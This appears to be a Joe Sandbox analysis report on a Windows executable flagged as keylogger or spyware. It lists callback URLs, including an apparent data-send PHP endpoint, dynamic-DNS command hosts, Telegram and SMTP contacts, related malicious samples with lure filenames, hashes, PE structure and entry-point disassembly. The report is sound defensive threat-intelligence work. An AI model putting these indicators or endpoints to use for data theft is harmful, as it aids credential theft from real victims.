http://aborters.duckdns.org:8081 | RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
http://mail.irco.com.sa | RegSvcs.exe, 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002935000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | RegSvcs.exe, 00000002.00000002.4794997601.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002857000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://anotherarmy.dns.army:8081 | RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.4794997601.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://reallyfreegeoip.org/xml/ | RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
IP map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
46.151.208.21 | mail.irco.com.sa | Saudi Arabia | 51975 | NASHIRNET-ASNNASHIRNETASNSA | true
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529912
Start date and time: 2024-10-09 14:44:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 7DI4iYwcvw.exe (renamed because the original name is a hash value)
Original Sample Name: 2b4eae5d8282eacacd17d2fdec8bf3e052baa7e7f60276854b9c077183aa2176.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 75
• Number of non-executed functions: 28
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: 7DI4iYwcvw.exe
Time | Type | Description
08:45:15 | API Interceptor | 11384522x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | TBC-9720743871300.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | Request for Quotation MK FMHS.RFQ.24.142.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | 9od7uqtxVz.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | 0kqoTVd5tK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | wrE1XO6ZFI.exe | Get hash | malicious | VIP Keylogger | Browse |
149.154.167.220 | IT3rIaXTLZ.exe | Get hash | malicious | AgentTesla | Browse |
149.154.167.220 | 9EIf7Sfk3P.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | pQGOxS84rW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | aq4u3y2hLo.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | Opposer.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
193.122.6.168 | aq4u3y2hLo.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | Commercial_Invoice_Remittance_Copies_PDF.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | rRdJ0JnTcM.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | HWAf2RPKH6.exe | Get hash | malicious | DarkTortilla, Snake Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | kG713MWffq.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | rRdJ0JnTcM.exe | Get hash | malicious | VIP Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | 9WFX0d4wa8.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | Mellekelve a proforma szamla.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | Purchase 2.doc | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | Y1ZqkGzvKm.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | TBC-9720743871300.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | Request for Quotation MK FMHS.RFQ.24.142.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | 9od7uqtxVz.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | ZH0pJV4XmV.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | 0kqoTVd5tK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | wUOozlNZS3.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | wrE1XO6ZFI.exe | Get hash | malicious | VIP Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | wUOozlNZS3.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | awb_dhl 9102845290_160924R0 _323282-_563028621286.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | 9EIf7Sfk3P.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
checkip.dyndns.com | TBC-9720743871300.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | Request for Quotation MK FMHS.RFQ.24.142.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | 9od7uqtxVz.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | ZH0pJV4XmV.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | 0kqoTVd5tK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | wUOozlNZS3.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | wrE1XO6ZFI.exe | Get hash | malicious | VIP Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | wUOozlNZS3.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | awb_dhl 9102845290_160924R0 _323282-_563028621286.exe | Get hash | malicious | Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | 9EIf7Sfk3P.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
api.telegram.org | TBC-9720743871300.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | Request for Quotation MK FMHS.RFQ.24.142.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | 9od7uqtxVz.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | 0kqoTVd5tK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | wrE1XO6ZFI.exe | Get hash | malicious | VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | IT3rIaXTLZ.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
api.telegram.org | 9EIf7Sfk3P.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | pQGOxS84rW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | aq4u3y2hLo.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | Opposer.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ORACLE-BMC-31898US | 9od7uqtxVz.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
ORACLE-BMC-31898US | wUOozlNZS3.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.130.0
ORACLE-BMC-31898US | 9EIf7Sfk3P.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
ORACLE-BMC-31898US | pQGOxS84rW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
ORACLE-BMC-31898US | aq4u3y2hLo.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.6.168
ORACLE-BMC-31898US | Commercial_Invoice_Remittance_Copies_PDF.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.6.168
ORACLE-BMC-31898US | Scanned.pdf.pif.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
ORACLE-BMC-31898US | Zapytanie ofertowe (LINCOLNELECTRIC 100924).vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.130.0
ORACLE-BMC-31898US | rRdJ0JnTcM.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.6.168
ORACLE-BMC-31898US | ixgyfGK4yl.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
TELEGRAMRU | TBC-9720743871300.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Request for Quotation MK FMHS.RFQ.24.142.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | 9od7uqtxVz.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | 0kqoTVd5tK.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | wrE1XO6ZFI.exe | Get hash | malicious | VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | IT3rIaXTLZ.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
TELEGRAMRU | 9EIf7Sfk3P.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | pQGOxS84rW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | aq4u3y2hLo.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Opposer.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
CLOUDFLARENETUS | PaymentIBAN Confirmation.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 172.67.212.58
CLOUDFLARENETUS | SWIFT 103 202410071251443120 071024-pdf.vbs | Get hash | malicious | Remcos | Browse | 188.114.97.3
CLOUDFLARENETUS | TBC-9720743871300.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
CLOUDFLARENETUS | COT139562833.ATMetorlogya.xls | Get hash | malicious | Unknown | Browse | 104.21.16.225
CLOUDFLARENETUS | Request for Quotation MK FMHS.RFQ.24.142.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
CLOUDFLARENETUS | Ordin de plat#U0103.docx.doc | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | COT139562833.ATMetorlogya.xls | Get hash | malicious | Unknown | Browse | 104.21.16.225
CLOUDFLARENETUS | PAYMENT APPLICATION.xls | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | lWfpGAu3ao.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
CLOUDFLARENETUS | COT139562833.ATMetorlogya.xls | Get hash | malicious | Unknown | Browse | 172.67.216.69
NASHIRNET-ASNNASHIRNETASNSA | 92.249.48.47-skid.x86-2024-07-20T09_04_17.elf | Get hash | malicious | Mirai, Moobot | Browse | 185.79.251.94
                                                                              Request For Quotation - ( 11 APR 2022) exp. 15 APR 2022.pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 46.151.208.26
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              54328bd36c14bd82ddaa0c04b25ed9adTBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              ZH0pJV4XmV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              awb_dhl 9102845290_160924R0 _323282-_563028621286.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              3b5074b1b5d032e5620f69f9f700ff0eSWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                              • 149.154.167.220
                                                                              SAS #U00e7#U0131kt#U0131.PDF.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              TBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              PAGO.vbsGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              TRASFERENCIA.vbsGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              SAS #U00e7#U0131kt#U0131.PDF.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              No context
Process: C:\Users\user\Desktop\7DI4iYwcvw.exe
File Type: data
Category: dropped
Size (bytes): 276992
Entropy (8bit): 6.919788310434921
Encrypted: false
SSDEEP: 6144:0pecUYpsZwW7PYDPAVZMTncg6I3GPOevf5j2KJFY2ee/Rd+gFrknqwKGnb:0pecUY6Zt7PYDPAVZMTncf02O+RCKJF4
MD5: 7CB974580A956C51F1B75E08FC5A9183
SHA1: 26FC8ECA0F96A34EDCF010F1ECFB24F771EFD234
SHA-256: DABE5CD567B68F8D23D4C8BE82A4BC5E03FF2E01F11A2BA19BE020C78AB469DB
SHA-512: 4943FEC9BE8D07E843B2FE4B1232B67C880F72AB64FA55FA4A2C94D7F90428891CFC15DB58A18136FEDF2294288E5233829FA56E212E1D77591F5CBB85C79032
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.4796103400524805
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 7DI4iYwcvw.exe
File size: 1'257'083 bytes
MD5: e142f0bf6c0d9be52f8c7f52007c64d0
SHA1: 36d40ea847e5f16424951fc9a5bd19f739705c87
SHA256: 2b4eae5d8282eacacd17d2fdec8bf3e052baa7e7f60276854b9c077183aa2176
SHA512: a334eabb9f749c006c36392d065f22026589edca7bba4ee40f41feaf224fa824f1c8d8f0673a6c9307c3c7e9583b390f198b2d036d056d0f685df55f88e755a9
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaC3SdUyu5RvluTUUOtioFCl1Hy:7JZoQrbTFZY1iaC3kUyrTStiXS
TLSH: 8345E121B9C69036C2B323B19E7FF769963D79360336D29727C82D225EA04416B39773
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                              Instruction
                                                                              call 00007FDBA8D2AA3Bh
                                                                              jmp 00007FDBA8D218AEh
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push edi
                                                                              push esi
                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                              mov ecx, dword ptr [ebp+10h]
                                                                              mov edi, dword ptr [ebp+08h]
                                                                              mov eax, ecx
                                                                              mov edx, ecx
                                                                              add eax, esi
                                                                              cmp edi, esi
                                                                              jbe 00007FDBA8D21A2Ah
                                                                              cmp edi, eax
                                                                              jc 00007FDBA8D21BC6h
                                                                              cmp ecx, 00000080h
                                                                              jc 00007FDBA8D21A3Eh
                                                                              cmp dword ptr [004A9724h], 00000000h
                                                                              je 00007FDBA8D21A35h
                                                                              push edi
                                                                              push esi
                                                                              and edi, 0Fh
                                                                              and esi, 0Fh
                                                                              cmp edi, esi
                                                                              pop esi
                                                                              pop edi
                                                                              jne 00007FDBA8D21A27h
                                                                              jmp 00007FDBA8D21E02h
                                                                              test edi, 00000003h
                                                                              jne 00007FDBA8D21A36h
                                                                              shr ecx, 02h
                                                                              and edx, 03h
                                                                              cmp ecx, 08h
                                                                              jc 00007FDBA8D21A4Bh
                                                                              rep movsd
                                                                              jmp dword ptr [00416740h+edx*4]
                                                                              mov eax, edi
                                                                              mov edx, 00000003h
                                                                              sub ecx, 04h
                                                                              jc 00007FDBA8D21A2Eh
                                                                              and eax, 03h
                                                                              add ecx, eax
                                                                              jmp dword ptr [00416654h+eax*4]
                                                                              jmp dword ptr [00416750h+ecx*4]
                                                                              nop
                                                                              jmp dword ptr [004166D4h+ecx*4]
                                                                              nop
                                                                              inc cx
                                                                              add byte ptr [eax-4BFFBE9Ah], dl
                                                                              inc cx
                                                                              add byte ptr [ebx], ah
                                                                              ror dword ptr [edx-75F877FAh], 1
                                                                              inc esi
                                                                              add dword ptr [eax+468A0147h], ecx
                                                                              add al, cl
                                                                              jmp 00007FDBAB19A227h
                                                                              add esi, 03h
                                                                              add edi, 03h
                                                                              cmp ecx, 08h
                                                                              jc 00007FDBA8D219EEh
                                                                              rep movsd
                                                                              jmp dword ptr [00000000h+edx*4]
                                                                              Programming Language:
                                                                              • [ C ] VS2010 SP1 build 40219
                                                                              • [C++] VS2010 SP1 build 40219
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [ASM] VS2010 SP1 build 40219
                                                                              • [RES] VS2010 SP1 build 40219
                                                                              • [LNK] VS2010 SP1 build 40219
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974 |
| RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689 |
| RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919 |
| RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474 |
| RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856 |
| RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445 |
| RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021 |
| RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758 |
| RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702 |
| RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9 |
| RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508 |
| RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976 |
| RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713 |
| RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365 |
| RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531 |
| RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186 |
| RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939 |
| RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718 |
| RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581 |
